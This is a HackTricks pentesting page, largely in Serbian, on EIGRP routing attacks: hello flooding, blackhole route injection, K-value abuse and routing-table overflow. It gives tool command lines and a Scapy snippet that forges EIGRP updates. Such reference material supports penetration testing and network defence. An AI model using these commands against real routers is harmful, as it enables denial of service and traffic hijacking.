EIGRP Attacks
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Ovo je rezime napada izloženih u https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Pogledajte ga za više informacija.
Fake EIGRP Neighbors Attack
- Cilj: Preopteretiti CPU rutera preplavljivanjem EIGRP hello paketa, potencijalno dovodeći do Denial of Service (DoS) napada.
- Alat: skripta helloflooding.py.
- Izvršenje:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
- Parametri:
--interface: Specifikuje mrežni interfejs, npr.eth0.--as: Definiše broj EIGRP autonomnog sistema (AS), npr.1.--subnet: Postavlja subnet lokaciju, npr.10.10.100.0/24.
EIGRP Blackhole Attack
- Cilj: Da poremeti tok mrežnog saobraćaja ubacivanjem lažnog route-a, što dovodi do blackhole-a gde saobraćaj bude usmeren na nepostojeću destinaciju.
- Alat: skripta routeinject.py.
- Izvršenje:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
- Parametri:
--interface: Specifikuje interfejs napadačevog sistema.--as: Definiše EIGRP AS broj.--src: Postavlja IP adresu napadača.--dst: Postavlja ciljnu subnet IP adresu.--prefix: Definiše masku ciljne subnet IP adrese.
Abusing K-Values Attack
- Cilj: Da izazove kontinuirane prekide i ponovna uspostavljanja veza unutar EIGRP domena ubacivanjem izmenjenih K-vrednosti, što efikasno dovodi do DoS napada.
- Alat: skripta relationshipnightmare.py.
- Izvršenje:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
- Parametri:
--interface: Specifikuje mrežni interfejs.--as: Definiše EIGRP AS broj.--src: Postavlja IP adresu legitimnog rutera.
Routing Table Overflow Attack
- Cilj: Dovesti do opterećenja CPU-a i RAM-a rutera preplavljivanjem ruting tabele brojnim lažnim route-ovima.
- Alat: skripta routingtableoverflow.py.
- Izvršenje:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
- Parametri:
--interface: Specifikuje mrežni interfejs.--as: Definiše EIGRP AS broj.--src: Postavlja IP adresu napadača.
Protocol Notes Useful for Attacks
- HELLO packets carry K-values and neighbors only form when they match. Ovo je osnova za napade zasnovane na neusaglašenim K-vrednostima i prekid odnosa, i objašnjava zašto neusaglašene K-vrednosti sprečavaju uspostavljanje adjacencije.
- The PARAMETER TLV (Type 0x0001) in HELLO (and initial UPDATE) carries K-values and Hold Time, pa pasivni snimci otkrivaju tačne vrednosti koje se koriste na segmentu.
Scapy Packet Crafting (Route Injection / Fake Neighbors)
Scapy ships an EIGRP contrib layer with TLVs like EIGRPParam and EIGRPIntRoute, which is enough to craft UPDATEs for route injection. Example adapted from the davidbombal/scapy EIGRP route injection script:
from scapy.all import *
load_contrib("eigrp")
sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))
Isti repo sadrži brze “fake neighbor” skripte koje presreću pravi EIGRP paket i ponovo ga šalju sa spoofed source IP da bi kreirale phantom neighbors (korisno za opterećenje CPU-a/neighbor-table).
- Scapy EIGRP contrib dokumentacija: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
- Primer skripti: https://github.com/davidbombal/scapy
Routopsy & NSE Helpers
- Routopsy gradi virtuelnu laboratoriju za napade na rutere (FRRouting + Scapy) i uključuje DRP napade koje možete prilagoditi za EIGRP testove. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
- Nmap’s NSE ima malu
eigrpbiblioteku za parsiranje/generisanje podskupa EIGRP paketa. https://nmap.org/nsedoc/lib/eigrp.html
Authentication Recon
- EIGRP named mode podržava HMAC-SHA-256 authentication putem
authentication mode hmac-sha-256 .... Ako je omogućeno, kreirani paketi moraju biti autentifikovani ispravnim ključem; ako nije omogućeno, spoofing/injection je lakše izvesti/validirati.
References
- https://www.rfc-editor.org/rfc/rfc7868.html
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.


